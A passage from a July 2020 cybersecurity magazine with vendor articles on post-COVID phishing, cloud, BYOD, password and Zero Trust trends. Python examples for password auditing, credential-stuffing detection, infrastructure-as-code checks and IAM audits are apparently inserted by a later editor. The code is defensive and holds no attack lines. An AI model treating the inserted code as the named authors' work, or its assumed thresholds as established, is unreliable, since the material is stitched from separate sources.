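    return {pw: accts for pw, accts in by_pw.items() if len(accts) > 1}


def audit(vault: dict, personal_terms, min_bits: float = 60.0) -> dict:
    """Run the three checks over a vault (account -> password) and return the
    issues found per account; accounts with no issues are omitted."""
    reused = reused_passwords(vault)
    findings = {}
    for account, pw in vault.items():
        issues = []
        if entropy_bits(pw) < min_bits:
            issues.append("low-entropy")
        if personal_info_hits(pw, personal_terms):
            issues.append("personal-info")
        if pw in reused:
            issues.append("reused")
        if issues:
            findings[account] = issues
    return findings


# Constructed sample data for a demo run (not real accounts or passwords).
SAMPLE_VAULT = {
    "bank": "Rex1984!",               # pet's name + birth year, and reused below
    "email": "Rex1984!",
    "shop": "7v#Qm2$kLp9@Xz4!Rt1&",   # generator-style 20-character password
}
PERSONAL_TERMS = ["Rex", "1984", "Jane"]

if __name__ == "__main__":
    print("generated:", generate_password())
    for account, issues in audit(SAMPLE_VAULT, PERSONAL_TERMS).items():
        print(f"{account}: {', '.join(issues)}")
```

The entropy figure is deliberately an upper bound: it only tells you how hard a generated password is to brute force, which is why the personal-term and reuse checks are run separately; a memorable password can score well on length and still be trivial to guess.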
Although biometric authentication doesn’t appear to be replacing passwords in the near future, perhaps<br />
the best authentication method is a hybrid one in which passwords and biometrics co-exist to deliver a<br />
comprehensive security solution.<br />
About the Author<br />
Joshua Frisby is the Founder of PasswordManagers.co. His mission<br />
is to help you protect your passwords. Whether you want to securely<br />
manage passwords for personal, family, or business use,<br />
PasswordManagers.co is here to help you stay safe. Josh can be<br />
reached via email or LinkedIn.<br />
Post COVID-19: Cloud, Remote Work and BYOD Security<br />
Predictions<br />
By Anurag Kahol, CTO and co-founder, Bitglass<br />
Cloud adoption has already been growing rapidly, but we’ll see a sharp increase in adoption in<br />
2020 as a result of the global pandemic.<br />
Recent events have impacted businesses and schools all around the world, causing them to shift to<br />
remote work wherever possible. Cloud adoption gives employees and students the freedom to operate<br />
from the safety of their homes by granting remote access to needed data and services. However, even<br />
before the outbreak, cloud adoption was outpacing the adoption of the tools needed to properly protect<br />
data in cloud environments. In 2019, 86% of organizations deployed cloud-based tools, but a mere 34%<br />
made use of single sign-on (SSO), a basic but critical capability for authenticating users and securing<br />
access to corporate cloud environments. This statistic suggests deeper underlying cloud security issues<br />
within organizations and indicates that data breaches will continue to arise around the world.<br />
The shift to widespread remote work also increases the likelihood of insider threats.<br />
Verizon’s 2019 Data Breach Investigations Report found that approximately 34% of breaches involved<br />
internal actors. Additionally, a recent survey conducted on IT professionals about insider threats revealed<br />
that only half of organizations provide user training regarding insider threats. While protecting data from<br />
malicious external actors is typically top of mind for most organizations, the fact remains that they must<br />
also defend against employees, whether they are malicious or merely careless.<br />
Phishing attacks are not a groundbreaking threat, and general employee awareness of these schemes<br />
has grown in recent years; however, hackers still find success with this tactic by taking advantage of<br />
major news. In fact, the United Nations' health agency released an alert warning of an increased number<br />
of cybercriminals posing as World Health Organization (WHO) representatives amid the current<br />
pandemic. During this stressful time, recipients of these messages are more likely to click on malicious<br />
URLs, open attachments, and give up personal data. Because of this, insider threats will spike and be a<br />
leading cause of data breaches in 2020.<br />
Businesses will implement changes to ensure BYOD devices are secure.<br />
A majority of organizations (85%) were already somewhat prepared for remote work by enabling bring<br />
your own device (BYOD) policies. On the flipside, not all companies that have adopted BYOD are doing<br />
so securely. For example, 43% of businesses do not know if the devices employees are using to access<br />
corporate data are infected with malware, demonstrating a disturbing lack of visibility. By the end of 2020,<br />
we will likely see even higher BYOD adoption rates, whether out of necessity for enabling remote work,<br />
or simply for BYOD’s many benefits, including enhanced mobility, efficiency, and employee satisfaction.<br />
Regardless, when companies enable BYOD, they must also implement agentless security measures that<br />
can protect corporate data on personal devices. With agentless tools, IT gains security and compliance<br />
without invading user privacy through agents on employees’ personal endpoints. As organizations<br />
increasingly realize that cybersecurity must be a top priority, we predict that the use of agentless security<br />
solutions will rise alongside that of BYOD.<br />
About the Author<br />
Anurag is the CTO and co-founder of Bitglass where he<br />
expedites the company’s technology direction and<br />
architecture. Anurag was director of engineering in Juniper<br />
Networks’ Security Business Unit before co-founding Bitglass.<br />
Anurag received a global education, earning an M.S. in<br />
computer science from Colorado State University, and a B.S.<br />
in computer science from the Motilal Nehru National Institute<br />
Of Technology.<br />
The Rise of COVID-19 Phishing Attacks: How Cyber<br />
Adversaries Are Adopting Phishing to Generate New<br />
Threat Vectors<br />
By Brad Slavin, CEO of DuoCircle LLC<br />
While COVID-19 has locked all people in their homes, with office premises closed, cyber adversaries<br />
seem to have a field day using the pandemic as a launchpad for phishing attacks. Organizations and<br />
individuals must be aware of the detective, preventive, and protective measures to safeguard their<br />
information assets against these attacks.<br />
As the COVID-19 pandemic assumes global proportions, it is natural for people to become anxious.<br />
People naturally turn to the internet to acquire the latest information on the coronavirus related drugs,<br />
vaccines, etc. At the same time, social engineering attacks have been on the rise as malicious actors<br />
worldwide keep developing sophisticated tools and techniques to entice employees as well as individuals<br />
to reveal sensitive and confidential information, such as personally identifiable information (PII), financial<br />
data, or user account credentials. Let's dive deep into the gravity of the situation before discussing what<br />
the best anti-phishing solutions and techniques are that organizations and individuals can make use of.<br />
Some Hard Facts and Statistics on Phishing Attacks Based On COVID-19<br />
Researchers reveal that cybercriminals are primarily employing three ingenious phishing attack<br />
methodologies to target victims. They are brand impersonation, scamming, and business email<br />
compromise (BEC). Here are a few spine-chilling statistics on COVID-19 phishing scams that have made<br />
headlines around the world.<br />
• There has been an unprecedented rise in phishing scams with more than 854,000 confirmed<br />
phishing and counterfeit web-pages reported in Q1 of 2020. Besides, more than 4 million pages<br />
fall in the category of suspicious pages.<br />
• The alarming issue is that nearly 30% of these confirmed phishing pages (approximately more<br />
than a quarter of a million) pertain to COVID-19 alone.<br />
• Though the first COVID-19 related phishing scam surfaced by the end of January 2020, the figure<br />
for March 2020 alone is 9,116, a 667% increase over February 2020.<br />
• Eighteen million malware and phishing emails and more than 240 million COVID-19-related spam<br />
email messages are sent over Gmail daily.<br />
• Citizens in the US have lost somewhere around $12 million to coronavirus phishing attacks. And<br />
in the UK, it's over £2 million.<br />
Healthcare - The Most Vulnerable Industry Domain to Phishing Attacks<br />
COVID-19 has kept the entire world on tenterhooks. Fear, uncertainty, and doubt (FUD) and the<br />
non-availability of a reliable cure or vaccine are the primary reasons for the panic in people's minds.<br />
Thus, when they encounter an email message seemingly originating from an influential source like the<br />
US Centers for Disease Control and Prevention, WHO, or other prominent health agencies, people rarely<br />
check their authenticity. Recently, there has been a surge of phishing emails sent by these malicious<br />
actors impersonating healthcare professionals and organizations, making healthcare one of the most<br />
vulnerable sectors in coronavirus times.<br />
Offer for Loans and Grants - The Most Effective COVID-19 Phishing Attack<br />
The pandemic has thrown the world economy in disarray. It has affected almost every segment of society.<br />
Under these circumstances, people eagerly look forward to government aid such as EMI moratoriums,<br />
loans, and other giveaways. Malicious actors have been taking advantage of these situations and are<br />
trying to lure people to fictitious websites, where the unsuspecting users end up providing vital information<br />
leading to severe data breaches. These attacks are seen in the form of phishing emails, ransomware, or<br />
banking malware attacks.<br />
Donation Solicitations - The Most Dangerous COVID-19 Phishing Scam<br />
Global pandemics like COVID-19 bring out the humanitarian side of people in a substantial way.<br />
Generally, people donate generously towards their respective National Disaster Relief Funds, and<br />
research funds set up by their governments. There have been numerous incidents of cybercriminals<br />
taking advantage of such philanthropic activities. One of the most notorious methods is to design<br />
fundraising pages that not only mislead users into donating money but also steal sensitive personal<br />
information. Using such information, like names, email addresses, phone numbers, credit card details,<br />
and internet banking usernames and passwords, these malicious actors accept money using the names<br />
of disaster relief funds.<br />
COVID-19 Vaccine and Cure Scam - The Most Ingenious COVID-19 Phishing Attack<br />
While researchers are struggling to find an antidote for the coronavirus, numerous fake websites<br />
advertising medicines and vaccines have sprung up on the internet. More than 20,000 new<br />
COVID-19-related domains have been registered in the past few weeks. These websites also claim to sell<br />
COVID-19 personal protective kits like face masks, sanitizers, hand gloves, and medicines such as<br />
hydroxychloroquine, remdesivir, and so on. Such fraudulent websites ask for full payment in<br />
advance, and unsuspecting people end up parting with their money only to discover that they have been<br />
victims of cybercrime. Amazon itself reported over a million fake products in this category over the past<br />
couple of months.<br />
Detective, Preventive and Protective Measures Individuals & Enterprises Can Adopt<br />
Cybercriminals play on the psychology of the victim by sending email messages with COVID-19 related<br />
information that come with a malicious attachment or infectious URL. Knowing these<br />
threats can be the best defense in thwarting such attempts:<br />
• Reliance on Trusted Sources: Rely on authentic or official websites to get reliable information and<br />
updates about the coronavirus. Be scrupulous in clicking on the links provided on articles and<br />
blogs that share information on COVID-19.<br />
• Refrain from The Temptation To Click/Download: Sometimes, ignoring unsolicited emails is the<br />
best phishing prevention method. Downloading or opening malicious attachments or clicking on<br />
an infectious URL allows malicious actors to gain access to network systems.<br />
• Knowing the Phishing Techniques: The latest tactic deployed by malicious actors is to set up live<br />
tracker websites from which people can purportedly get live coronavirus updates. Though the<br />
websites appear legitimate, they are scamming attempts that end up with the user compromising<br />
their confidential information.<br />
• Phishing Protection Solutions: The best way to deal with phishing threats is to install a trusted<br />
anti-phishing solution to thwart any attempt made by adversaries.<br />
• Phishing Awareness: Phishing awareness training plays an integral part in safeguarding<br />
information assets. Enterprises should educate and train their employees, customers, and third-party<br />
vendors on types of phishing, anti-phishing techniques, and phishing prevention best<br />
practices, etc.<br />
Post COVID-19 – What Does the Future Look Like?<br />
With lockdown restrictions in place almost everywhere, a significant proportion of people already have<br />
a presence online, from shopping and ordering food and essential items to working from home. The shift to<br />
a virtual workplace has become more pronounced than before, as a majority of online businesses are<br />
already allowing their employees to work from home, and many are likely to continue doing so post COVID-19,<br />
considering the numerous benefits and the overall increase in employee productivity.<br />
As a downside, though, cyber adversaries have seized the opportunity to target as many people as<br />
possible. Hence, one can expect a surge in phishing attacks and scams in times to come. Therefore, one<br />
should exercise extreme caution and neutralize the vulnerabilities to mitigate the information risks<br />
encountered because of COVID-19. Deploying an effective anti-phishing solution is the need of the hour<br />
to tackle these attacks better, and has never been so significant.<br />
About the Author<br />
Brad Slavin, CEO of DuoCircle LLC. Brad Slavin is a security<br />
industry veteran and the General Manager at DuoCircle LLC, a cloud<br />
email security firm. Before joining DuoCircle, Brad began his career<br />
in network security by founding a regional ISP in California and was<br />
the cofounder of the wireless wardriving and security software<br />
Netstumber.com, which was the recipient of the "Editor's Choice" -<br />
Laptop Magazine & Ziff-Davis i3 Award for innovation.<br />
Brad can be reached online at https://www.linkedin.com/in/bradslavin/ and our company website<br />
https://www.phishprotecion.com<br />
Post COVID-19: Password Extinction Accelerated;<br />
Telemedicine Spurs Fraud<br />
By Robert Prigge, CEO of Jumio<br />
Passwords will become extinct much faster than predicted.<br />
As the COVID-19 pandemic pushed more of us to self-isolate, Zoom became the go-to teleconferencing<br />
platform. In fact, Zoom went from 10 million daily meetings in December to 300 million today.<br />
Unfortunately, this surge in popularity came with a price tag — a lack of data privacy. Now, there are over<br />
500,000 stolen Zoom logins floating around the dark web for just .002 cents each. And this is just<br />
opening the door for account takeover (ATO) attacks via credential stuffing — a type of cyberattack where<br />
automated bots use those stolen account credentials to gain unauthorized access to user accounts. And<br />
Zoom is not alone. We’ve also seen a rash of account takeover attempts aimed at users of Microsoft’s<br />
proprietary Remote Desktop Protocol (RDP), striking millions per week.<br />
With data collected and sold on the dark web containing usernames and passwords from past breaches,<br />
and internet users often recycling the same login credentials across multiple platforms, cybercriminals<br />
have all of the tools they need to impersonate a user’s identity online. This means that if your online<br />
account is only protected by a username and password, then you’re likely going to be an ATO target. As<br />
a result, password-based authentication, multi-factor authentication (2FA) and knowledge-based<br />
authentication (KBA) will be a thing of the past much sooner than previously anticipated, and businesses<br />
will look to more sophisticated and secure login options for current and prospective users.<br />
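Credential stuffing as described above (bots replaying leaked username and password pairs) leaves a recognisable shape in authentication logs, and defenders can alert on it. The Python below is an added example for this edit, not code from the article or from Jumio: the log lines are constructed, and the window size, minimum number of distinct usernames and failure ratio are assumed thresholds that a team would tune to its own traffic.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed authentication log (not from any real system), one event per line:
# timestamp  source-IP  username  outcome
SAMPLE_LOG = """\
2020-04-01T09:00:01Z 203.0.113.7 alice FAIL
2020-04-01T09:00:02Z 203.0.113.7 bob FAIL
2020-04-01T09:00:02Z 203.0.113.7 carol FAIL
2020-04-01T09:00:03Z 203.0.113.7 dave SUCCESS
2020-04-01T09:00:04Z 203.0.113.7 erin FAIL
2020-04-01T09:00:05Z 203.0.113.7 frank FAIL
2020-04-01T09:00:06Z 203.0.113.7 grace FAIL
2020-04-01T09:00:07Z 203.0.113.7 heidi FAIL
2020-04-01T09:00:08Z 203.0.113.7 ivan FAIL
2020-04-01T09:00:09Z 203.0.113.7 judy FAIL
2020-04-01T09:05:00Z 198.51.100.4 alice FAIL
2020-04-01T09:05:20Z 198.51.100.4 alice FAIL
2020-04-01T09:05:45Z 198.51.100.4 alice SUCCESS
2020-04-01T10:30:00Z 192.0.2.9 bob SUCCESS
"""


def parse_line(line):
    """Split one constructed log line into (timestamp, ip, user, outcome)."""
    ts, ip, user, outcome = line.split()
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), ip, user, outcome


def detect_credential_stuffing(log_text, window=timedelta(minutes=5),
                               min_users=8, min_fail_ratio=0.8):
    """Flag source IPs that try many DISTINCT usernames inside a sliding window
    with a high failure ratio. Stuffing replays one leaked username:password
    pair per account, so the tell is breadth across accounts rather than depth
    of guesses against one account (the 198.51.100.4 pattern above is a user
    mistyping their own password, and is not flagged)."""
    by_ip = defaultdict(list)
    for line in log_text.strip().splitlines():
        ts, ip, user, outcome = parse_line(line)
        by_ip[ip].append((ts, user, outcome))

    alerts = {}
    for ip, events in by_ip.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1
            span = events[start:end + 1]
            users = {u for _, u, _ in span}
            fails = sum(o == "FAIL" for _, _, o in span)
            if len(users) >= min_users and fails / len(span) >= min_fail_ratio:
                # Successful logins inside the burst are accounts whose leaked
                # credentials still work: they need a forced reset, not just a block.
                alerts[ip] = {
                    "distinct_users": len(users),
                    "attempts": len(span),
                    "compromised": sorted(u for _, u, o in span if o == "SUCCESS"),
                }
    return alerts


if __name__ == "__main__":
    for ip, info in detect_credential_stuffing(SAMPLE_LOG).items():
        print(ip, info)
```

The useful output is the `compromised` list: blocking the source IP stops the current run, but the accounts that accepted a replayed password are the ones an ATO defender has to reset and notify, since the same pairs will be tried again from a different address.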
Telemedicine will open up new threat vectors for fraud.<br />
Given the health concerns involved with physically visiting a doctor or hospital during COVID-19, patients<br />
have been urged to stay home unless symptoms are considered severe. Because of this, telemedicine<br />
has been the most viable resource for those seeking medical counsel during this time. Unfortunately,<br />
there have also been over 3,000 healthcare-related breaches that have impacted more than 500 million<br />
medical records in the past decade, a trend that has been escalating year-over-year. Due to the high<br />
amount of personal information, medical records command a high value on the dark web and can be<br />
listed for up to $1,000 each, 10 times more than the average credit card data breach record.<br />
Cybercriminals can then easily obtain this information and impersonate legitimate patients.<br />
This stolen information can also be used to obtain free medical or dental care. Because of this, CIOs will<br />
scramble to ensure procedures are in place so that doctors know their patients are who they say they are<br />
—and this is the domain of the emerging field of Know Your Patient (KYP). This means healthcare<br />
provider organizations need to adopt identity safeguards similar to the Know Your Customer (KYC)<br />
regulations adopted by the financial service industry.<br />
About the Author<br />
Robert Prigge is responsible for all aspects of Jumio’s business and<br />
strategy. Specializing in security and enterprise business, he held C-level<br />
or senior management positions at Infrascale, Secure Computing,<br />
McAfee, Quest Software, Sterling Commerce and IBM. Robert can be<br />
reached online via LinkedIn, on Twitter @rprigge and at Jumio’s website,<br />
www.jumio.com.<br />
The Future Of Security – Predictions Post COVID-19<br />
By Mike Riemer, Pulse Secure, Global Chief Security Architect<br />
The Future of Work post COVID-19 - Larger Remote Workforce with Cybersecurity Built into the<br />
Culture<br />
“A recent Gartner survey of over 300 CFOs found that 74% of respondents say they expect to move<br />
previously on-site employees to remote post-COVID-19. As such, a large remote workforce is forcing<br />
companies to re-evaluate how to evolve their corporate culture and invest in capital. Embedding a long-term<br />
cybersecurity strategy as part of this evolution to keep workers safe will be critical.<br />
Ultimately, an effective security culture mitigates the risk of a breach as a result of credential theft,<br />
phishing and business email compromise (BEC) – and working with employees to protect their privacy<br />
addresses a growing issue for many people, 28% of whom have had their identity hacked or stolen. That<br />
number increases to 35% when looking at the entire U.S.<br />
However, as businesses are quick to ditch their office spaces, they will need to allow employees to have<br />
secure remote access to corporate systems as well as implement Zero Trust. Zero Trust is an approach<br />
based on the concept of continuous verification and authorization. It ensures that only authenticated<br />
users with compliant devices, whether corporate, personal or public, can connect to authorized<br />
applications over any network, whether on-premises or in the cloud. This will help remote workers to<br />
engender more confidence that their business and personal data is secure. “<br />
Zero Trust Must be Part of the Future of Work During and Post COVID-19<br />
“The need for Zero Trust security has never been greater, especially due to increased targeted attacks,<br />
rapid work from home mandates, and mounting privacy compliance obligations due to COVID-19. As<br />
such, enterprise adoption of the Zero Trust security model is growing as mobility and hybrid IT models<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 119<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
have placed most workloads beyond the shelter of corporate networks and traditional perimeter defense.<br />
This creates significant user access and data concerns.<br />
The <strong>2020</strong> Zero Trust Progress Report by Pulse Secure revealed that nearly a third of cybersecurity<br />
professionals have expressed value in applying Zero Trust to address hybrid IT security issues. This<br />
report, which surveyed more than 400 cyber security decision makers, found that 72% of organizations<br />
plan to assess or implement Zero Trust capabilities in some capacity in <strong>2020</strong> to mitigate growing cyber<br />
risk, while nearly half (47%) of cyber security professionals lack confidence applying a Zero Trust model<br />
to their Secure Access architecture.<br />
With its principle of user, device and infrastructure verification before granting conditional access based<br />
on least privilege, Zero Trust holds the promise of vastly enhanced usability, data protection and<br />
governance and must be part of any security architecture as we navigate the current COVID-19 business<br />
landscape.”<br />
Telemedicine and Remote Field Offices are Changing the Needs of Healthcare Professionals<br />
“Healthcare is going the way of other industries with employees being asked to work remotely and post<br />
COVID-19, we believe the use of telemedicine and remote field offices will be the new normal in<br />
healthcare.<br />
As such, IT teams must provide healthcare workers with mobile devices that are protected, even on<br />
expanded Wi-Fi networks or cellular networks as employees are often working outside secure networks,<br />
opening their mobile devices to additional threats.<br />
Increasing remote capacity on network protections such as VPNs, extends security to those workers in<br />
the field, ensuring that both patient information as well as other personal information stored on those<br />
devices is safe. By deploying Zero Trust policies, info security teams can also implement fine-tuned user<br />
access management to ensure that network capacity is maximized and that workers only have access to<br />
the information that’s absolutely necessary.”<br />
About the Author<br />
Mike Riemer is the Global Chief Security Architect for Pulse Secure, where<br />
he has worked for the last six years. He has over 37 years of IT and IT<br />
Security experience and is a Certified Instructor on Firewall/Virtual Private<br />
Networking, Intrusion Detection/Prevention, SSL/VPN and Network Access<br />
Control disciplines. He previously spent 25 years with the U.S. Air Force<br />
working in <strong>Cyber</strong> Security and Intelligence.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 120<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Post COVID-19 Cybersecurity and Future-of-Work Predictions

By DivvyCloud by Rapid7, Chris DeRamus, VP of Technology, Cloud Security Practice

Remote work is here to stay:

“Some organizations (including DivvyCloud) preferred coming into the office for work prior to the pandemic because we enjoyed the sense of community. But the current situation has changed our outlook on remote work, and the same is true for many organizations around the world. Many companies are quickly realizing their employees are just as productive working from home through cloud apps and services as they are in the office space. In fact, in many cases employees are even more productive because they don’t waste time commuting. As such, we should expect plenty of organizations to transition to more frequent (or even permanent) remote work models once stay-at-home orders have been lifted. Organizations may even reduce or eliminate office spaces to cut back on overhead costs, especially those looking to climb out of economic hardship caused by the pandemic.”

To support remote work, organizations will need to prioritize cloud spend:

“Organizations have been spending more on cloud infrastructure to support their remote workforces. Increased demand spurred AWS’ sales to surpass $10 billion this past quarter and Azure is running out of capacity in some regions. As a result, organizations will need to “tighten the operational belt” from a budget perspective and ensure that the proper security and governance controls, virtual desktop infrastructure (VDI), and other key instances are implemented.

For DivvyCloud and plenty of other organizations, real-time communications platforms like Slack and Teams have been invaluable for navigating the work-from-home experience, and we can expect to see a heightened demand for these tools even once this pandemic subsides. Additionally, organizations will need to focus on identity and access management in their cloud infrastructure. This will ensure employees are able to securely access the tools and resources they need to do their jobs while thwarting fraudulent unauthorized attempts from bad actors.”

Choosing between security and innovation in the cloud will continue to be a common, avoidable pitfall:

“Nearly 50% of developers and engineers bypass cloud security and compliance policies and just 58% of organizations have clear guidelines for developers building applications in the public cloud. Developers work hard and fast to deploy new features and services to meet market demands, but without the proper guardrails in place, this can lead to misconfigured cloud instances, severe security flaws, and more.

In fact, in early April, it became publicly known that Zoom’s engineers bypassed common security features, such as not requiring users to add unique file names before saving their videos. While this allowed Zoom to support its exponential jump in demand (from 10 million daily users in December 2019 to over 200 million in March 2020), it also resulted in errors such as thousands of users’ videos being made publicly accessible on unprotected Amazon buckets. This news added to a string of other privacy concerns around Zoom. DevOps and security must be completely in sync to avoid similar pitfalls.”

Engineers will begin to tackle cloud security flaws earlier in the build pipeline:

“Security and compliance practices have been mainly reactive, with teams scrambling to catch security/compliance flaws after cloud resources are built. But as anyone in that position can attest, there’s no putting the genie back in the lamp. Instead, engineers will need to focus on how “to-be-built” infrastructure or changes will affect the security and compliance of their cloud footprint while they are still in the continuous integration/continuous deployment pipeline.

For example, Zoom’s CEO pledged to shift the company’s engineering resources to proactively address issues with measures such as a third-party review of changes before they’re made, white box pen tests to further identify and address issues, and upgrading Zoom’s encryption scheme to AES 256-bit GCM encryption. Other organizations will leverage capabilities such as Infrastructure as Code security to build a virtual data model of what would have been built and either affirm or deny the compliance of proposed changes while also warning engineers of potential violations, thus giving them the opportunity to learn from the experience and incorporate learnings into future projects.”
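The pre-build check described in the prediction above, shown as an added example that is not DivvyCloud's, Rapid7's or Zoom's code. It assumes a simplified, Terraform-plan-like JSON document listing the resources a change *would* create, and evaluates each planned resource against a small rule set (public bucket ACL, missing encryption, security group open to the internet) before anything is built. The plan document, resource names and rule set are constructed for illustration.

```python
"""Pre-deployment compliance gate over a planned cloud change set (added example)."""
import json

# Constructed sample plan, loosely modelled on a Terraform plan's
# resource_changes: two new S3 buckets, one security group, one deletion.
PLANNED_CHANGES = json.dumps({
    "resource_changes": [
        {"address": "aws_s3_bucket.recordings", "type": "aws_s3_bucket",
         "change": {"actions": ["create"],
                    "after": {"bucket": "meeting-recordings",
                              "acl": "public-read",
                              "server_side_encryption": None}}},
        {"address": "aws_s3_bucket.audit_logs", "type": "aws_s3_bucket",
         "change": {"actions": ["create"],
                    "after": {"bucket": "audit-logs",
                              "acl": "private",
                              "server_side_encryption": "aws:kms"}}},
        {"address": "aws_security_group.admin", "type": "aws_security_group",
         "change": {"actions": ["create"],
                    "after": {"ingress": [{"from_port": 22, "to_port": 22,
                                           "cidr_blocks": ["0.0.0.0/0"]}]}}},
        {"address": "aws_s3_bucket.old", "type": "aws_s3_bucket",
         "change": {"actions": ["delete"], "after": None}},
    ]
})


def check_s3_bucket(after):
    """Rules for a bucket's post-change state; returns human-readable findings."""
    findings = []
    if after.get("acl") in ("public-read", "public-read-write"):
        findings.append("bucket ACL grants public access")
    if not after.get("server_side_encryption"):
        findings.append("bucket has no server-side encryption configured")
    return findings


def check_security_group(after):
    """Flag any ingress rule that admits the whole internet."""
    findings = []
    for rule in after.get("ingress", []):
        if "0.0.0.0/0" in rule.get("cidr_blocks", []):
            findings.append(
                f"ingress {rule['from_port']}-{rule['to_port']} open to the internet")
    return findings


# Constructed rule table: resource type -> checker over its "after" state.
RULES = {"aws_s3_bucket": check_s3_bucket,
         "aws_security_group": check_security_group}


def evaluate_plan(plan_json):
    """Return (approved, violations) for a plan document.

    Only resources that will exist after the change are evaluated; a pure
    deletion has no post-state ("after" is None) and is skipped.
    """
    plan = json.loads(plan_json)
    violations = []
    for rc in plan["resource_changes"]:
        after = rc["change"]["after"]
        if after is None:
            continue
        checker = RULES.get(rc["type"])
        if checker is None:
            continue  # no rules for this type; unknown types are not blocked
        for msg in checker(after):
            violations.append((rc["address"], msg))
    return (len(violations) == 0, violations)


if __name__ == "__main__":
    approved, violations = evaluate_plan(PLANNED_CHANGES)
    print("APPROVED" if approved else "DENIED")
    for address, msg in violations:
        print(f"  {address}: {msg}")
```

Wired into a CI stage, a `DENIED` result fails the pipeline before apply, which is the point the prediction makes: the engineer sees the violation next to the proposed change, while it is still cheap to fix.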
IAM is (and will continue to be) the primary perimeter in cloud security:

“All users, apps, services, and systems in the cloud have an identity, and as organizations shifted to remote styles of work, they quickly learned that these relationships are complex. Understanding the full picture of access in the cloud and working toward least privileged access are difficult, but necessary, endeavors to ensure security in the cloud. In the last couple of months, plenty of enterprise security professionals have realized that cloud identity and access management (IAM) is an area where they are vulnerable because they lack insight into the complex problem.

The repercussions of poor IAM governance are substantial and sometimes unpredictable. For example, last year a former AWS employee accessed over 100 million Capital One customers’ records after she bypassed a misconfigured web application firewall, then used privilege escalation to access the data.

To protect the identity perimeter at scale, organizations need an automated monitoring and remediation solution for access management, role management, identity authentication and compliance auditing – all of which help enterprise security teams stay ahead in this complex landscape. Even once this pandemic subsides, we will continue to see a great emphasis placed on cloud IAM, especially as organizations continue to encourage remote work.”
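One piece of the automated monitoring the prediction calls for, a least-privilege audit of role policies, as an added example that is not DivvyCloud's or AWS's code. It walks role-to-policy mappings in the standard IAM JSON policy shape and flags Allow statements that grant broad access: wildcard actions, service-wide wildcards, wildcard resources, and actions on services outside the role's declared job function. The roles, policy documents, account id and per-role service baseline are all constructed.

```python
"""Least-privilege audit of cloud IAM policy documents (added example)."""

# Constructed baseline: the service prefixes each role legitimately needs.
ROLE_BASELINE = {
    "web-app-role": {"s3", "sqs"},
    "reporting-role": {"s3", "athena"},
}

# Constructed policy documents attached to those roles.
ROLE_POLICIES = {
    "web-app-role": {
        "Version": "2012-10-17",
        "Statement": [
            {"Effect": "Allow", "Action": ["s3:GetObject", "s3:PutObject"],
             "Resource": "arn:aws:s3:::app-uploads/*"},
            {"Effect": "Allow", "Action": "sqs:SendMessage",
             "Resource": "arn:aws:sqs:us-east-1:123456789012:app-queue"},
        ],
    },
    "reporting-role": {
        "Version": "2012-10-17",
        "Statement": [
            {"Effect": "Allow", "Action": "s3:*", "Resource": "*"},
            {"Effect": "Allow",
             "Action": ["iam:CreateUser", "iam:AttachUserPolicy"],
             "Resource": "*"},
            {"Effect": "Deny", "Action": "athena:*", "Resource": "*"},
        ],
    },
}


def _as_list(value):
    """IAM allows a string or a list for Action/Resource; normalise to a list."""
    return value if isinstance(value, list) else [value]


def audit_role(role, policy, baseline):
    """Return a list of (severity, message) findings for one role's policy."""
    findings = []
    allowed_services = baseline.get(role, set())
    for stmt in policy["Statement"]:
        if stmt.get("Effect") != "Allow":
            continue  # Deny statements only narrow access
        actions = _as_list(stmt["Action"])
        resources = _as_list(stmt["Resource"])
        for action in actions:
            if action == "*":
                findings.append(("high", f"{role}: Allow on every action"))
                continue
            service, _, verb = action.partition(":")
            if service not in allowed_services:
                findings.append(("high",
                    f"{role}: action {action} outside role baseline "
                    f"{sorted(allowed_services)}"))
            if verb == "*":
                findings.append(("medium",
                    f"{role}: service-wide wildcard {action}"))
        if "*" in resources:
            findings.append(("medium",
                f"{role}: statement applies to all resources "
                f"({', '.join(actions)})"))
    return findings


def audit_all(role_policies, baseline):
    """Audit every role; result maps role -> findings list."""
    return {role: audit_role(role, policy, baseline)
            for role, policy in role_policies.items()}


def roles_exceeding_baseline(report):
    """Roles with at least one high-severity finding: review candidates."""
    return sorted(role for role, findings in report.items()
                  if any(sev == "high" for sev, _ in findings))


if __name__ == "__main__":
    report = audit_all(ROLE_POLICIES, ROLE_BASELINE)
    for role, findings in report.items():
        print(role, "OK" if not findings else "")
        for sev, msg in findings:
            print(f"  [{sev}] {msg}")
    print("needs review:", roles_exceeding_baseline(report))
```

The baseline is the part a real program has to earn: it encodes what each role is *for*, and the audit only finds drift relative to it. Run on a schedule, the output is the "full picture of access" the article says teams lack, reduced to a list of roles whose grants exceed their job.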
About the Author

Chris is the VP of Technology, Cloud Security Practice at DivvyCloud by Rapid7. He is a technical pioneer whose passion is finding innovative and elegant new ways to deliver security, compliance and governance to customers running at scale in hybrid cloud environments. He remains deeply technical, writing code and diving into the latest technologies and services being deployed by partners like Amazon, Microsoft, Google, VMware, and OpenStack.

Before co-founding DivvyCloud, Chris was the Online Operations Manager at Electronic Arts for the Mythic Studio, where he helped design, build and operate large scale cloud infrastructure spanning public and private clouds to run Electronic Arts’ largest online games (including Warhammer Online: Wrath of Heroes and Warhammer Online: Age of Reckoning). He started his career as a Network & System Administrator at the U.S. Department of Energy, where he was mandated with a broad array of technical responsibilities including security and compliance.

Chris earned his Bachelor of Business Administration in Computer Information Systems from James Madison University.
Building A Telework Health Scorecard To Meet Surge Requirements And Long-Term Resiliency

By Stan Lowe, Global Chief Information Security Officer, Zscaler

Over the past months, the U.S. Federal government has deployed solutions to keep employees productive and secure from any location, including at home. The initial rapid response typically included increasing capacity, deploying new remote access options, and enhancing security measures.

As CIOs and CISOs move forward from the initial crisis mode, they now need to take a harder look at the systems in place – what is working and what is needed. But to get the right answers, we have to ask the right questions.

There are different sets of considerations and evaluation questions to ask in initial crisis phases vs. in steady-state environments. IT leaders can build customized telework health scorecards for these two phases to provide a comprehensive view and then prioritize the next steps.

Initial Crisis Telework Health Evaluation Criteria

